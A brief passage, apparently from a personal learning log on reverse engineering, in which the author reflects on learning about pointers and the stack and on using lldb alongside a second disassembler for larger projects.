- learned how to pass pointers to routines and about the stack.
I must admit that the usage of lldb for complex projects may not be sufficient. I am making a point of approaching larger projects with two disassemblers side by side.